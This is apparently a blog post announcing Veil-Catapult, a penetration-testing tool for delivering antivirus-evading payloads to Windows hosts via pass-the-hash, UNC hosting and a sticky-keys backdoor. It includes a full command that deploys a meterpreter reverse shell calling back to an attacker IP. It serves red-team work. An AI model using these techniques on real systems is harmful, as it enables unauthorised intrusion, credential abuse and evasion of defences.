Payload delivery for when Metasploit’s psexec and its stock .exe templates fail is a common problem for penetration testers. A while back Attack Research released a great post entitled “psexec fail? upload and exec instead“, which detailed how to upload and execute specified payloads. The excellent tool SMBexec can accomplish the same goal, utilizing a patched version of samba to upload .exe’s and trigger them. These options are great, but we wanted to build something that utilized the Veil framework for payload generation and filled in a few of the gaps we felt were missing.
We’d like to announce the newest addition to the Veil-Framework, our payload delivery tool Veil-Catapult. Utilizing the Impacket library from Core Labs and the passing-the-hash toolkit, as well as the full functionality of Veil-Evasion, Veil-Catapult meets all of your AV-evading payload delivery needs:
EXE delivery features seamless integration with Veil-Evasion. If you don’t want to specify a custom executable, you can drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, you have access to all the latest methods and modules as they’re released. After you’ve specified your options and built an executable, you’re dropped right back into the Veil-Catapult menu for target information. Single IPs or target lists can be specified, a domain can optionally be specified, and credentials can use hashes as well as normal passwords:
Triggering utilizes the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis doesn’t create a service, but pth-winexe will run as system, so which to choose is situation dependent. Payloads can also be uploaded and triggered on a victim, or hosted on a temporary Impacket SMB server on your attacker box and triggered with \\UNC paths. A nice side effect of UNC triggering is that some otherwise disk-detectable .exe’s will get right by a lot of antivirus : )
Note: python pyinstaller payloads can’t be hosted and MUST be uploaded in order to work properly.
Standalone payloads offers some tried and true methods as well as a slightly new approach. Powershell can be invoked using the standard command line shellcode-injecting payload generated by Veil-Evasion, and the sticky keys sethc backdoor can be triggered as well, both with the same wmis or winexe options.
The Barebones python injector is a neat approach which we’ll be talking about in detail in an upcoming blog post. But feel free to check it out now : )
Cleanup functionality has also been incorporated. Whenever an exe is uploaded/host and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on popped hosts, and then delete any uploaded binaries. The sethc backdoor also generates a cleanup script.
And of course, we have command line flags for every option- try ./Veil-Catapult.py -h for all the details:
The following example takes an IP list, a hashdump/pwdump formatted cred file with an admin hash, pth-wmis for triggering, uses the c/shellcode_inject/void payload and specific MSF parameters to generate an .exe with Veil-Evasion, hosts the executable and triggers it on your IP, and doesn’t confirm before launching:
./Veil-Catapult.py -tL ips.txt -cF d.txt –wmis -p c/shellcode_inject/void –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=172.16.199.236 LPORT=4444 –act hostexec –lip 172.16.199.236 -nc
- –tL : provides a list of IPs to target
- -cF : provides a pwdump file that Veil-Catapult extracts the admin account out of
- –wmis : specifies for pth-wmis to be used for triggering
- –p … : specifies the Veil-Evasion payload to be used
- –msfpayload : details the Metasploit shellcode to be used by the Veil-Evasion payload
- –msfoptions : provides additional configuration details for the Metasploit payload
- –act hostexec : instructs Veil-Catapult to host the payload and execute by \\UNC path
- –lip : the local IP needed for UNC invocation
- -nc : don’t confirm before firing off the attack
Veil-Catapult’s introduction marks our long-intended goal of expanding the Veil-Framework beyond just AV-evasion. We’ve moved our original Veil repository to https://github.com/Veil-Framework/Veil-Evasion/ and established a new repository for Veil-Catapult at https://github.com/Veil-Framework/Veil-Catapult/ . A superproject will be maintained at https://github.com/Veil-Framework/Veil/ that will pull in each tool in the Veil-Framework. We recommend that most users pull down the superproject to make sure everything works correctly together. If you choose to run the tools in different locations, be sure to edit /etc/veil/settings.py as appropriate if anything happens to malfunction.
Demo by Meta-Thrunks!